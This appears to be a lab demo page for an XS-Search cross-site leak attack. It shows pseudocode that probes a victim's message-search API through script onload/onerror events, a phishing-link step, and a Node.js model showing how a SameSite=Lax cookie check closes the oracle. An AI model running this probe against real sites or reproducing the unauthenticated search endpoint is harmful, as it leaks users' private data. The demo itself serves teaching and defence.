💀 XS-Leaks Demo // attacker console

Attack 1 — XS-Search via Error Events

The payload loads each keyword as a <script src="…"> pointing at the victim API. HTTP 200 fires onload (HIT). HTTP 404/401 fires onerror (MISS / blocked).

How it works

Payload running in Alice's browser at https://attacker.ssc-primesec.de:

  for each keyword:
    const s = document.createElement('script')
    s.src = 'https://intravault.ssc-primesec.de/api/messages/search?q=bonus'
      ↳ cookie is NOT sent (cross-site + SameSite=Lax) when PROTECTED
      ↳ server skips cookie check when VULNERABLE
    s.onload = () => report('HIT')    ← HTTP 200
    s.onerror = () => report('MISS')  ← HTTP 404 (no match) or 401 (no cookie)

Target: https://intravault.ssc-primesec.de/api/messages/search
Oracle: HTTP 200 vs 404/401
Leaks: Message keywords
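
Added example (not part of the original demo): a Node.js model of the two victim modes described above, showing why checking a SameSite=Lax session cookie before the lookup collapses the 200-vs-404 oracle into a uniform 401. The cookie name sid, the session value, the sample messages and the function names are assumptions; the two hosts are treated as cross-site, as the page states.

```javascript
// Added example: constructed data, hypothetical names (sid, searchStatus, observe).
const MESSAGES = ['Q3 bonus payout approved', 'Lunch on Friday?']; // constructed
const SESSIONS = new Set(['sess-alice']);                          // constructed

// Cookie the victim app would issue in PROTECTED mode (attribute set is an assumption).
const SET_COOKIE = 'sid=sess-alice; Path=/; HttpOnly; Secure; SameSite=Lax';

// Browser side: SameSite=Lax cookies are withheld on cross-site subresource
// loads such as <script src>. "Site" means registrable domain, not origin.
function cookieHeaderFor({ crossSite, subresource }) {
  const lax = /;\s*SameSite=Lax/i.test(SET_COOKIE);
  if (lax && crossSite && subresource) return '';
  return SET_COOKIE.split(';')[0];
}

// Server side: status returned by /api/messages/search.
function searchStatus(url, cookieHeader, protectedMode) {
  if (protectedMode) {
    const m = /(?:^|;\s*)sid=([^;]+)/.exec(cookieHeader);
    if (!m || !SESSIONS.has(m[1])) return 401; // checked before any lookup
  }
  const q = (new URL(url).searchParams.get('q') || '').toLowerCase();
  return q && MESSAGES.some(t => t.toLowerCase().includes(q)) ? 200 : 404;
}

// What a cross-site page can distinguish: onload for 200, onerror otherwise.
function observe(keywords, protectedMode) {
  const cookie = cookieHeaderFor({ crossSite: true, subresource: true });
  return keywords.map(k => {
    const url = 'https://intravault.ssc-primesec.de/api/messages/search?q=' +
      encodeURIComponent(k);
    return searchStatus(url, cookie, protectedMode) === 200 ? 'HIT' : 'MISS';
  });
}

console.log('vulnerable:', observe(['bonus', 'salary'], false));
console.log('protected: ', observe(['bonus', 'salary'], true));
```

In protected mode every keyword yields the same 401, so the error event no longer carries information about message contents.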

📎 Phishing link — send this to Alice

https://attacker.ssc-primesec.de/payload/1
Alice must be logged in at intravault.test:3000. If victim protection is 🟢 ON → attack fails. If 🔴 OFF → attack succeeds.
